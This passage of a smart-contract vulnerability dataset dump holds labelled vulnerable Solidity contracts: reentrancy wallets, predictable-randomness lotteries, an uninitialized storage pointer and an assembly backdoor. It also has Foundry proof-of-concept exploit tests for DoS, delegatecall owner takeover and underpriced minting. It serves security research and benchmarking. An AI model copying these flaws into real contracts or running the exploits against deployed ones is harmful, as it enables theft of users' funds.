if(msg.value > MinDeposit) 30 | { 31 | balances[msg.sender]+=msg.value; 32 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 33 | lastBlock = block.number; 34 | } 35 | } 36 | 37 | function CashOut(uint _am) 38 | public 39 | payable 40 | { 41 | if(_am<=balances[msg.sender]&&block.number>lastBlock) 42 | { 43 | // REENTRANCY 44 | if(msg.sender.call.value(_am)()) 45 | { 46 | balances[msg.sender]-=_am; 47 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 48 | } 49 | } 50 | } 51 | 52 | function() public payable{} 53 | 54 | } 55 | 56 | contract Log 57 | { 58 | 59 | struct Message 60 | { 61 | address Sender; 62 | string Data; 63 | uint Val; 64 | uint Time; 65 | } 66 | 67 | Message[] public History; 68 | 69 | Message LastMsg; 70 | 71 | function AddMessage(address _adr,uint _val,string _data) 72 | public 73 | { 74 | LastMsg.Sender = _adr; 75 | LastMsg.Time = now; 76 | LastMsg.Val = _val; 77 | LastMsg.Data = _data; 78 | History.push(LastMsg); 79 | } 80 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/DOS.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | contract ContractTest is Test { 7 | KingOfEther KingOfEtherContract; 8 | Attack AttackerContract; 9 | function setUp() public { 10 | 11 | KingOfEtherContract = new KingOfEther(); 12 | AttackerContract = new Attack(KingOfEtherContract); 13 | } 14 | 15 | function testDOS() public { 16 | 17 | address alice = vm.addr(1); 18 | address bob = vm.addr(2); 19 | vm.deal(address(alice), 1 ether); 20 | vm.deal(address(bob), 2 ether); 21 | vm.prank(alice); 22 | KingOfEtherContract.claimThrone{value: 1 ether}() ; 23 | vm.prank(bob); 24 | KingOfEtherContract.claimThrone{value: 2 ether}() ; 25 | console.log("Return 1 ETH to Alice, Alice of balance", address(alice).balance); 26 | AttackerContract.attack{value: 3 ether}(); 27 | 28 | console.log("Balance of KingOfEtherContract", KingOfEtherContract.balance()); 29 | console.log("Attack completed, Alice claimthrone again, she will fail"); 30 | vm.prank(alice); 31 | KingOfEtherContract.claimThrone{value: 1 ether}() ; 32 | 33 | } 34 | receive() payable external{} 35 | } 36 | 37 | 38 | contract KingOfEther { 39 | address public king; 40 | uint public balance; 41 | 42 | function claimThrone() external payable { 43 | require(msg.value > balance, "Need to pay more to become the king"); 44 | 45 | (bool sent, ) = king.call{value: balance}(""); 46 | require(sent, "Failed to send Ether"); 47 | 48 | balance = msg.value; 49 | king = msg.sender; 50 | } 51 | } 52 | 53 | contract Attack { 54 | KingOfEther kingOfEther; 55 | 56 | constructor(KingOfEther _kingOfEther) { 57 | kingOfEther = KingOfEther(_kingOfEther); 58 | } 59 | 60 | function attack() public payable { 61 | kingOfEther.claimThrone{value: msg.value}(); 62 | } 63 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 29 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract U_BANK 10 | { 11 | function Put(uint _unlockTime) 12 | public 13 | payable 14 | { 15 | var acc = Acc[msg.sender]; 16 | acc.balance += msg.value; 17 | acc.unlockTime = _unlockTime>now?_unlockTime:now; 18 | LogFile.AddMessage(msg.sender,msg.value,"Put"); 19 | } 20 | 21 | function Collect(uint _am) 22 | public 23 | payable 24 | { 25 | var acc = Acc[msg.sender]; 26 | if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime) 27 | { 28 | // REENTRANCY 29 | if(msg.sender.call.value(_am)()) 30 | { 31 | acc.balance-=_am; 32 | LogFile.AddMessage(msg.sender,_am,"Collect"); 33 | } 34 | } 35 | } 36 | 37 | function() 38 | public 39 | payable 40 | { 41 | Put(0); 42 | } 43 | 44 | struct Holder 45 | { 46 | uint unlockTime; 47 | uint balance; 48 | } 49 | 50 | mapping (address => Holder) public Acc; 51 | 52 | Log LogFile; 53 | 54 | uint public MinSum = 2 ether; 55 | 56 | function U_BANK(address log) public{ 57 | LogFile = Log(log); 58 | } 59 | } 60 | 61 | 62 | contract Log 63 | { 64 | struct Message 65 | { 66 | address Sender; 67 | string Data; 68 | uint Val; 69 | uint Time; 70 | } 71 | 72 | Message[] public History; 73 | 74 | Message LastMsg; 75 | 76 | function AddMessage(address _adr,uint _val,string _data) 77 | public 78 | { 79 | LastMsg.Sender = _adr; 80 | LastMsg.Time = now; 81 | LastMsg.Val = _val; 82 | LastMsg.Data = _data; 83 | History.push(LastMsg); 84 | } 85 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 29 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract WALLET 10 | { 11 | function Put(uint _unlockTime) 12 | public 13 | payable 14 | { 15 | var acc = Acc[msg.sender]; 16 | acc.balance += msg.value; 17 | acc.unlockTime = _unlockTime>now?_unlockTime:now; 18 | LogFile.AddMessage(msg.sender,msg.value,"Put"); 19 | } 20 | 21 | function Collect(uint _am) 22 | public 23 | payable 24 | { 25 | var acc = Acc[msg.sender]; 26 | if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime) 27 | { 28 | // REENTRANCY 29 | if(msg.sender.call.value(_am)()) 30 | { 31 | acc.balance-=_am; 32 | LogFile.AddMessage(msg.sender,_am,"Collect"); 33 | } 34 | } 35 | } 36 | 37 | function() 38 | public 39 | payable 40 | { 41 | Put(0); 42 | } 43 | 44 | struct Holder 45 | { 46 | uint unlockTime; 47 | uint balance; 48 | } 49 | 50 | mapping (address => Holder) public Acc; 51 | 52 | Log LogFile; 53 | 54 | uint public MinSum = 1 ether; 55 | 56 | function WALLET(address log) public{ 57 | LogFile = Log(log); 58 | } 59 | } 60 | 61 | 62 | contract Log 63 | { 64 | struct Message 65 | { 66 | address Sender; 67 | string Data; 68 | uint Val; 69 | uint Time; 70 | } 71 | 72 | Message[] public History; 73 | 74 | Message LastMsg; 75 | 76 | function AddMessage(address _adr,uint _val,string _data) 77 | public 78 | { 79 | LastMsg.Sender = _adr; 80 | LastMsg.Time = now; 81 | LastMsg.Val = _val; 82 | LastMsg.Data = _data; 83 | History.push(LastMsg); 84 | } 85 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 29 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract MY_BANK 10 | { 11 | function Put(uint _unlockTime) 12 | public 13 | payable 14 | { 15 | var acc = Acc[msg.sender]; 16 | acc.balance += msg.value; 17 | acc.unlockTime = _unlockTime>now?_unlockTime:now; 18 | LogFile.AddMessage(msg.sender,msg.value,"Put"); 19 | } 20 | 21 | function Collect(uint _am) 22 | public 23 | payable 24 | { 25 | var acc = Acc[msg.sender]; 26 | if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime) 27 | { 28 | // REENTRANCY 29 | if(msg.sender.call.value(_am)()) 30 | { 31 | acc.balance-=_am; 32 | LogFile.AddMessage(msg.sender,_am,"Collect"); 33 | } 34 | } 35 | } 36 | 37 | function() 38 | public 39 | payable 40 | { 41 | Put(0); 42 | } 43 | 44 | struct Holder 45 | { 46 | uint unlockTime; 47 | uint balance; 48 | } 49 | 50 | mapping (address => Holder) public Acc; 51 | 52 | Log LogFile; 53 | 54 | uint public MinSum = 1 ether; 55 | 56 | function MY_BANK(address log) public{ 57 | LogFile = Log(log); 58 | } 59 | } 60 | 61 | 62 | contract Log 63 | { 64 | struct Message 65 | { 66 | address Sender; 67 | string Data; 68 | uint Val; 69 | uint Time; 70 | } 71 | 72 | Message[] public History; 73 | 74 | Message LastMsg; 75 | 76 | function AddMessage(address _adr,uint _val,string _data) 77 | public 78 | { 79 | LastMsg.Sender = _adr; 80 | LastMsg.Time = now; 81 | LastMsg.Val = _val; 82 | LastMsg.Data = _data; 83 | History.push(LastMsg); 84 | } 85 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 29 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract W_WALLET 10 | { 11 | function Put(uint _unlockTime) 12 | public 13 | payable 14 | { 15 | var acc = Acc[msg.sender]; 16 | acc.balance += msg.value; 17 | acc.unlockTime = _unlockTime>now?_unlockTime:now; 18 | LogFile.AddMessage(msg.sender,msg.value,"Put"); 19 | } 20 | 21 | function Collect(uint _am) 22 | public 23 | payable 24 | { 25 | var acc = Acc[msg.sender]; 26 | if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime) 27 | { 28 | // REENTRANCY 29 | if(msg.sender.call.value(_am)()) 30 | { 31 | acc.balance-=_am; 32 | LogFile.AddMessage(msg.sender,_am,"Collect"); 33 | } 34 | } 35 | } 36 | 37 | function() 38 | public 39 | payable 40 | { 41 | Put(0); 42 | } 43 | 44 | struct Holder 45 | { 46 | uint unlockTime; 47 | uint balance; 48 | } 49 | 50 | mapping (address => Holder) public Acc; 51 | 52 | Log LogFile; 53 | 54 | uint public MinSum = 1 ether; 55 | 56 | function W_WALLET(address log) public{ 57 | LogFile = Log(log); 58 | } 59 | } 60 | 61 | 62 | contract Log 63 | { 64 | struct Message 65 | { 66 | address Sender; 67 | string Data; 68 | uint Val; 69 | uint Time; 70 | } 71 | 72 | Message[] public History; 73 | 74 | Message LastMsg; 75 | 76 | function AddMessage(address _adr,uint _val,string _data) 77 | public 78 | { 79 | LastMsg.Sender = _adr; 80 | LastMsg.Time = now; 81 | LastMsg.Val = _val; 82 | LastMsg.Data = _data; 83 | History.push(LastMsg); 84 | } 85 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 29 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract X_WALLET 10 | { 11 | function Put(uint _unlockTime) 12 | public 13 | payable 14 | { 15 | var acc = Acc[msg.sender]; 16 | acc.balance += msg.value; 17 | acc.unlockTime = _unlockTime>now?_unlockTime:now; 18 | LogFile.AddMessage(msg.sender,msg.value,"Put"); 19 | } 20 | 21 | function Collect(uint _am) 22 | public 23 | payable 24 | { 25 | var acc = Acc[msg.sender]; 26 | if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime) 27 | { 28 | // REENTRANCY 29 | if(msg.sender.call.value(_am)()) 30 | { 31 | acc.balance-=_am; 32 | LogFile.AddMessage(msg.sender,_am,"Collect"); 33 | } 34 | } 35 | } 36 | 37 | function() 38 | public 39 | payable 40 | { 41 | Put(0); 42 | } 43 | 44 | struct Holder 45 | { 46 | uint unlockTime; 47 | uint balance; 48 | } 49 | 50 | mapping (address => Holder) public Acc; 51 | 52 | Log LogFile; 53 | 54 | uint public MinSum = 1 ether; 55 | 56 | function X_WALLET(address log) public{ 57 | LogFile = Log(log); 58 | } 59 | } 60 | 61 | 62 | contract Log 63 | { 64 | struct Message 65 | { 66 | address Sender; 67 | string Data; 68 | uint Val; 69 | uint Time; 70 | } 71 | 72 | Message[] public History; 73 | 74 | Message LastMsg; 75 | 76 | function AddMessage(address _adr,uint _val,string _data) 77 | public 78 | { 79 | LastMsg.Sender = _adr; 80 | LastMsg.Time = now; 81 | LastMsg.Val = _val; 82 | LastMsg.Data = _data; 83 | History.push(LastMsg); 84 | } 85 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/time_manipulation/ether_lotto.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @article: https://blog.positive.com/predicting-random-numbers-in-ethereum-smart-contracts-e5358c6b8620 3 | * @source: https://etherscan.io/address/0xa11e4ed59dc94e69612f3111942626ed513cb172#code 4 | * @vulnerable_at_lines: 43 5 | * @author: - 6 | */ 7 | 8 | pragma solidity ^0.4.15; 9 | 10 | /// @title Ethereum Lottery Game. 11 | 12 | contract EtherLotto { 13 | 14 | // Amount of ether needed for participating in the lottery. 15 | uint constant TICKET_AMOUNT = 10; 16 | 17 | // Fixed amount fee for each lottery game. 18 | uint constant FEE_AMOUNT = 1; 19 | 20 | // Address where fee is sent. 21 | address public bank; 22 | 23 | // Public jackpot that each participant can win (minus fee). 24 | uint public pot; 25 | 26 | // Lottery constructor sets bank account from the smart-contract owner. 27 | function EtherLotto() { 28 | bank = msg.sender; 29 | } 30 | 31 | // Public function for playing lottery. Each time this function 32 | // is invoked, the sender has an oportunity for winning pot. 33 | function play() payable { 34 | 35 | // Participants must spend some fixed ether before playing lottery. 36 | assert(msg.value == TICKET_AMOUNT); 37 | 38 | // Increase pot for each participant. 39 | pot += msg.value; 40 | 41 | // Compute some *almost random* value for selecting winner from current transaction. 42 | // TIME_MANIPULATION 43 | var random = uint(sha3(block.timestamp)) % 2; 44 | 45 | // Distribution: 50% of participants will be winners. 46 | if (random == 0) { 47 | 48 | // Send fee to bank account. 49 | bank.transfer(FEE_AMOUNT); 50 | 51 | // Send jackpot to winner. 52 | msg.sender.transfer(pot - FEE_AMOUNT); 53 | 54 | // Restart jackpot. 55 | pot = 0; 56 | } 57 | } 58 | 59 | } 60 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Delegatecall.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | // Proxy Contract is designed for helping users call logic contract 7 | // Proxy Contract's owner is hardcoded as 0xdeadbeef 8 | // Can you manipulate Proxy Contract's owner ? 9 | 10 | contract Proxy { 11 | 12 | address public owner = address(0xdeadbeef); // slot0 13 | Delegate delegate; 14 | 15 | constructor(address _delegateAddress) public { 16 | delegate = Delegate(_delegateAddress); 17 | } 18 | 19 | fallback() external { 20 | (bool suc,) = address(delegate).delegatecall(msg.data); // vulnerable 21 | require(suc, "Delegatecall failed"); 22 | } 23 | } 24 | 25 | contract ContractTest is Test { 26 | Proxy proxy; 27 | Delegate DelegateContract; 28 | address alice; 29 | 30 | function setUp() public { 31 | alice = vm.addr(1); 32 | } 33 | 34 | function testDelegatecall() public { 35 | DelegateContract = new Delegate(); // logic contract 36 | proxy = new Proxy(address(DelegateContract)); // proxy contract 37 | 38 | console.log("Alice address", alice); 39 | console.log("DelegationContract owner", proxy.owner()); 40 | 41 | // Delegatecall allows a smart contract to dynamically load code from a different address at runtime. 42 | console.log("Change DelegationContract owner to Alice..."); 43 | vm.prank(alice); 44 | address(proxy).call(abi.encodeWithSignature("pwn()")); // exploit here 45 | // Proxy.fallback() will delegatecall Delegate.pwn() 46 | 47 | console.log("DelegationContract owner", proxy.owner()); 48 | console.log("Exploit completed, proxy contract storage has been manipulated"); 49 | } 50 | } 51 | 52 | contract Delegate { 53 | address public owner; // slot0 54 | 55 | function pwn() public { 56 | owner = msg.sender; 57 | } 58 | } 59 | 60 | 61 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/README.md: -------------------------------------------------------------------------------- 1 | # Access Control 2 | Access Control issues are common in all programs, not just smart contracts. In fact, it's number 5 on the OWASP top 10. One usually accesses a contract's functionality through its public or external functions. While insecure visibility settings give attackers straightforward ways to access a contract's private values or logic, access control bypasses are sometimes more subtle. These vulnerabilities can occur when contracts use the deprecated tx.origin to validate callers, handle large authorization logic with lengthy require and make reckless use of delegatecall in proxy libraries or proxy contracts. 3 | 4 | Loss: estimated at 150,000 ETH (~30M USD at the time) 5 | 6 | ## Attack Scenario 7 | A smart contract designates the address which initializes it as the contract's owner. This is a common pattern for granting special privileges such as the ability to withdraw the contract's funds. 8 | Unfortunately, the initialization function can be called by anyone — even after it has already been called. Allowing anyone to become the owner of the contract and take its funds. 9 | 10 | ## Examples 11 | In the following example, the contract's initialization function sets the caller of the function as its owner. However, the logic is detached from the contract's constructor, and it does not keep track of the fact that it has already been called. 12 | ``` 13 | function initContract() public { 14 | owner = msg.sender; 15 | } 16 | ``` 17 | In the Parity multi-sig wallet, this initialization function was detached from the wallets themselves and defined in a "library" contract. Users were expected to initialize their own wallet by calling the library's function via a delegateCall. Unfortunately, as in our example, the function did not check if the wallet had already been initialized. Worse, since the library was a smart contract, anyone could initialize the library itself and call for its destruction. 18 | 19 | ## References 20 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/other/crypto_roulette.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/thec00n/smart-contract-honeypots/blob/master/CryptoRoulette.sol 3 | * @vulnerable_at_lines: 40,41,42 4 | */ 5 | pragma solidity ^0.4.19; 6 | 7 | // CryptoRoulette 8 | // 9 | // Guess the number secretly stored in the blockchain and win the whole contract balance! 10 | // A new number is randomly chosen after each try. 11 | // https://www.reddit.com/r/ethdev/comments/7wp363/how_does_this_honeypot_work_it_seems_like_a/ 12 | // To play, call the play() method with the guessed number (1-20). Bet price: 0.1 ether 13 | 14 | contract CryptoRoulette { 15 | 16 | uint256 private secretNumber; 17 | uint256 public lastPlayed; 18 | uint256 public betPrice = 0.1 ether; 19 | address public ownerAddr; 20 | 21 | struct Game { 22 | address player; 23 | uint256 number; 24 | } 25 | Game[] public gamesPlayed; 26 | 27 | function CryptoRoulette() public { 28 | ownerAddr = msg.sender; 29 | shuffle(); 30 | } 31 | 32 | function shuffle() internal { 33 | // randomly set secretNumber with a value between 1 and 20 34 | secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1; 35 | } 36 | 37 | function play(uint256 number) payable public { 38 | require(msg.value >= betPrice && number <= 10); 39 | // OTHER - uninitialized storage 40 | Game game; //Uninitialized storage pointer 41 | game.player = msg.sender; 42 | game.number = number; 43 | gamesPlayed.push(game); 44 | 45 | if (number == secretNumber) { 46 | // win! 47 | msg.sender.transfer(this.balance); 48 | } 49 | 50 | shuffle(); 51 | lastPlayed = now; 52 | } 53 | 54 | function kill() public { 55 | if (msg.sender == ownerAddr && now > lastPlayed + 1 days) { 56 | suicide(msg.sender); 57 | } 58 | } 59 | 60 | function() public payable { } 61 | } 62 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 52 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract PrivateDeposit 10 | { 11 | mapping (address => uint) public balances; 12 | 13 | uint public MinDeposit = 1 ether; 14 | address public owner; 15 | 16 | Log TransferLog; 17 | 18 | modifier onlyOwner() { 19 | require(tx.origin == owner); 20 | _; 21 | } 22 | 23 | function PrivateDeposit() 24 | { 25 | owner = msg.sender; 26 | TransferLog = new Log(); 27 | } 28 | 29 | 30 | 31 | function setLog(address _lib) onlyOwner 32 | { 33 | TransferLog = Log(_lib); 34 | } 35 | 36 | function Deposit() 37 | public 38 | payable 39 | { 40 | if(msg.value >= MinDeposit) 41 | { 42 | balances[msg.sender]+=msg.value; 43 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 44 | } 45 | } 46 | 47 | function CashOut(uint _am) 48 | { 49 | if(_am<=balances[msg.sender]) 50 | { 51 | // REENTRANCY 52 | if(msg.sender.call.value(_am)()) 53 | { 54 | balances[msg.sender]-=_am; 55 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 56 | } 57 | } 58 | } 59 | 60 | function() public payable{} 61 | 62 | } 63 | 64 | contract Log 65 | { 66 | 67 | struct Message 68 | { 69 | address Sender; 70 | string Data; 71 | uint Val; 72 | uint Time; 73 | } 74 | 75 | Message[] public History; 76 | 77 | Message LastMsg; 78 | 79 | function AddMessage(address _adr,uint _val,string _data) 80 | public 81 | { 82 | LastMsg.Sender = _adr; 83 | LastMsg.Time = now; 84 | LastMsg.Val = _val; 85 | LastMsg.Data = _data; 86 | History.push(LastMsg); 87 | } 88 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/bad_randomness/lottery.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @article: https://blog.positive.com/predicting-random-numbers-in-ethereum-smart-contracts-e5358c6b8620 3 | * @source: https://etherscan.io/address/0x80ddae5251047d6ceb29765f38fed1c0013004b7#code 4 | * @vulnerable_at_lines: 38,42 5 | * @author: - 6 | */ 7 | 8 | //added pragma version 9 | pragma solidity ^0.4.0; 10 | 11 | contract Lottery { 12 | event GetBet(uint betAmount, uint blockNumber, bool won); 13 | 14 | struct Bet { 15 | uint betAmount; 16 | uint blockNumber; 17 | bool won; 18 | } 19 | 20 | address private organizer; 21 | Bet[] private bets; 22 | 23 | // Create a new lottery with numOfBets supported bets. 24 | function Lottery() { 25 | organizer = msg.sender; 26 | } 27 | 28 | // Fallback function returns ether 29 | function() { 30 | throw; 31 | } 32 | 33 | // Make a bet 34 | function makeBet() { 35 | // Won if block number is even 36 | // (note: this is a terrible source of randomness, please don't use this with real money) 37 | // BAD_RANDOMNESS 38 | bool won = (block.number % 2) == 0; 39 | 40 | // Record the bet with an event 41 | // BAD_RANDOMNESS 42 | bets.push(Bet(msg.value, block.number, won)); 43 | 44 | // Payout if the user won, otherwise take their money 45 | if(won) { 46 | if(!msg.sender.send(msg.value)) { 47 | // Return ether to sender 48 | throw; 49 | } 50 | } 51 | } 52 | 53 | // Get all bets that have been made 54 | function getBets() { 55 | if(msg.sender != organizer) { throw; } 56 | 57 | for (uint i = 0; i < bets.length; i++) { 58 | GetBet(bets[i].betAmount, bets[i].blockNumber, bets[i].won); 59 | } 60 | } 61 | 62 | // Suicide :( 63 | function destroy() { 64 | if(msg.sender != organizer) { throw; } 65 | 66 | suicide(organizer); 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 54 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract DEP_BANK 10 | { 11 | mapping (address=>uint256) public balances; 12 | 13 | uint public MinSum; 14 | 15 | LogFile Log; 16 | 17 | bool intitalized; 18 | 19 | function SetMinSum(uint _val) 20 | public 21 | { 22 | if(intitalized)throw; 23 | MinSum = _val; 24 | } 25 | 26 | function SetLogFile(address _log) 27 | public 28 | { 29 | if(intitalized)throw; 30 | Log = LogFile(_log); 31 | } 32 | 33 | function Initialized() 34 | public 35 | { 36 | intitalized = true; 37 | } 38 | 39 | function Deposit() 40 | public 41 | payable 42 | { 43 | balances[msg.sender]+= msg.value; 44 | Log.AddMessage(msg.sender,msg.value,"Put"); 45 | } 46 | 47 | function Collect(uint _am) 48 | public 49 | payable 50 | { 51 | if(balances[msg.sender]>=MinSum && balances[msg.sender]>=_am) 52 | { 53 | // REENTRANCY 54 | if(msg.sender.call.value(_am)()) 55 | { 56 | balances[msg.sender]-=_am; 57 | Log.AddMessage(msg.sender,_am,"Collect"); 58 | } 59 | } 60 | } 61 | 62 | function() 63 | public 64 | payable 65 | { 66 | Deposit(); 67 | } 68 | 69 | } 70 | 71 | 72 | contract LogFile 73 | { 74 | struct Message 75 | { 76 | address Sender; 77 | string Data; 78 | uint Val; 79 | uint Time; 80 | } 81 | 82 | Message[] public History; 83 | 84 | Message LastMsg; 85 | 86 | function AddMessage(address _adr,uint _val,string _data) 87 | public 88 | { 89 | LastMsg.Sender = _adr; 90 | LastMsg.Time = now; 91 | LastMsg.Val = _val; 92 | LastMsg.Data = _data; 93 | History.push(LastMsg); 94 | } 95 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Immunefi_ch1.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | import "@openzeppelin/contracts/token/ERC721/ERC721.sol"; 6 | import "@openzeppelin/contracts/access/Ownable.sol"; 7 | import "@openzeppelin/contracts/utils/Counters.sol"; 8 | 9 | // Immunefi #spotthebugchallenge! 10 | // https://twitter.com/immunefi/status/1557301712549023745 11 | 12 | contract ContractTest is Test { 13 | HerToken HerTokenContract; 14 | 15 | function testSafeMint() public { 16 | HerTokenContract = new HerToken(); 17 | 18 | 19 | HerTokenContract.safeMint{value: 1 ether}(address(this),10); 20 | console.log("Due to incorrect check msg.value, we can mint many NFTs with 1 Eth."); 21 | console.log("NFT minted:", HerTokenContract.balanceOf(address(this))); 22 | 23 | } 24 | function onERC721Received( 25 | address, 26 | address, 27 | uint256, 28 | bytes memory 29 | ) public returns (bytes4) { 30 | 31 | // HerTokenContract.safeMint{value: 1 ether}(address(this),30); 32 | return this.onERC721Received.selector; 33 | } 34 | receive() payable external{} 35 | 36 | } 37 | 38 | 39 | contract HerToken is ERC721, Ownable, Test { 40 | uint128 constant MINT_PRICE = 1 ether; 41 | uint128 constant MAX_SUPPLY = 10000; 42 | uint mintIndex; 43 | using Counters for Counters.Counter; 44 | Counters.Counter private _tokenIdCounter; 45 | 46 | constructor() ERC721("HarToken", "HRT") payable {} 47 | 48 | function safeMint(address to, uint256 amount) public payable { 49 | require(_tokenIdCounter.current()+ amount < MAX_SUPPLY, 'Cannot mint given amount.'); 50 | require(amount > 0, 'Must give a mint amount.'); 51 | for (uint256 i =0; i < amount; i++){ 52 | require(msg.value >= MINT_PRICE, 'Insufficient Ether.'); 53 | mintIndex = _tokenIdCounter.current() ; 54 | console.log("mintIndex",mintIndex); 55 | _safeMint(to, mintIndex); // no reentrancy issue, because we can not control tokenid. 56 | _tokenIdCounter.increment(); 57 | 58 | } 59 | } 60 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 54 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract BANK_SAFE 10 | { 11 | mapping (address=>uint256) public balances; 12 | 13 | uint public MinSum; 14 | 15 | LogFile Log; 16 | 17 | bool intitalized; 18 | 19 | function SetMinSum(uint _val) 20 | public 21 | { 22 | if(intitalized)throw; 23 | MinSum = _val; 24 | } 25 | 26 | function SetLogFile(address _log) 27 | public 28 | { 29 | if(intitalized)throw; 30 | Log = LogFile(_log); 31 | } 32 | 33 | function Initialized() 34 | public 35 | { 36 | intitalized = true; 37 | } 38 | 39 | function Deposit() 40 | public 41 | payable 42 | { 43 | balances[msg.sender]+= msg.value; 44 | Log.AddMessage(msg.sender,msg.value,"Put"); 45 | } 46 | 47 | function Collect(uint _am) 48 | public 49 | payable 50 | { 51 | if(balances[msg.sender]>=MinSum && balances[msg.sender]>=_am) 52 | { 53 | // REENTRANCY 54 | if(msg.sender.call.value(_am)()) 55 | { 56 | balances[msg.sender]-=_am; 57 | Log.AddMessage(msg.sender,_am,"Collect"); 58 | } 59 | } 60 | } 61 | 62 | function() 63 | public 64 | payable 65 | { 66 | Deposit(); 67 | } 68 | 69 | } 70 | 71 | 72 | 73 | contract LogFile 74 | { 75 | struct Message 76 | { 77 | address Sender; 78 | string Data; 79 | uint Val; 80 | uint Time; 81 | } 82 | 83 | Message[] public History; 84 | 85 | Message LastMsg; 86 | 87 | function AddMessage(address _adr,uint _val,string _data) 88 | public 89 | { 90 | LastMsg.Sender = _adr; 91 | LastMsg.Time = now; 92 | LastMsg.Val = _val; 93 | LastMsg.Data = _data; 94 | History.push(LastMsg); 95 | } 96 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Backdoor-assembly.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | /* 6 | Lottery game: anyone can call pickWinner to get prize if you are lucky. 7 | Refers to JST contract backdoor. many rugged style's contract has similar pattern. 8 | Looks like theres is no setwinner function in contract, how admin can rug? 9 | */ 10 | 11 | contract ContractTest is Test { 12 | LotteryGame LotteryGameContract; 13 | 14 | function testUnsafeCall() public { 15 | 16 | address alice = vm.addr(1); 17 | address bob = vm.addr(2); 18 | LotteryGameContract = new LotteryGame(); 19 | console.log("Alice perform pickWinner, of couse she will not be a winner"); 20 | vm.prank(alice); 21 | LotteryGameContract.pickWinner(address(alice)); 22 | console.log("Prize: ",LotteryGameContract.prize()); 23 | 24 | console.log("Now, admin set the winner to drain out the prize."); 25 | LotteryGameContract.pickWinner(address(bob)); 26 | console.log("Admin manipulated winner: ",LotteryGameContract.winner()); 27 | console.log("Exploit completed"); 28 | 29 | } 30 | receive() payable external{} 31 | } 32 | 33 | contract LotteryGame { 34 | uint256 public prize = 1000; 35 | address public winner; 36 | address public admin = msg.sender; 37 | 38 | modifier safeCheck() { 39 | if (msg.sender == referee()) { 40 | _; 41 | } else { 42 | getkWinner(); 43 | } 44 | } 45 | function referee() internal view returns (address user) { 46 | assembly { 47 | // load admin value at slot 2 of storage 48 | user := 